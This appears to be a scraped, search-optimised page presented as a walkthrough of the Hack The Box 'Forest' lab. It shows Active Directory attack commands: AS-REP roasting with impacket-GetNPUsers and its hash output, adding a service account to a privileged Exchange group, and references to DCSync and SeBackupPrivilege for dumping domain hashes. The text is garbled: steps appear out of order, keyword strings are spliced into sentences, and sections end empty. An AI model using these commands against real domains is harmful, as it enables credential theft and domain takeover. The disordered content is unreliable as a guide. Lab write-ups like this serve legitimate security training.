Forest Hackthebox Walkthrough Best Info

Now that we own the group, we can add ourselves to it. Then, we abuse DCSync to dump domain hashes.

Add-DomainGroupMember -Identity "Exchange Windows Permissions" -Member "svc-alfresco"
Forest is vulnerable to Kerberos AS-REP Roasting because some users have the Do not require Kerberos preauthentication setting enabled.
Running whoami /groups reveals a shocking privilege: forest hackthebox walkthrough best
SeBackupPrivilege        Enabled
SeRestorePrivilege       Enabled

This is game over for the domain controller.

SeBackupPrivilege allows reading any file on the system, including the NTDS.dit (the AD database).
impacket-GetNPUsers htb.local/ -usersfile users.txt -dc-ip 10.10.10.161 -request -format hashcat -outputfile asreproast.hashes

Output:
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
... (many failures) ...
$krb5asrep$23$svc-alfresco@htb.local:...

Bingo. The user svc-alfresco is vulnerable.
The Forest box on Hack The Box provides a challenging but educational experience in the realm of cybersecurity. By following this walkthrough, you'll be able to: LDAP / AD enumeration:

Best Practices and Takeaways

Additional Resources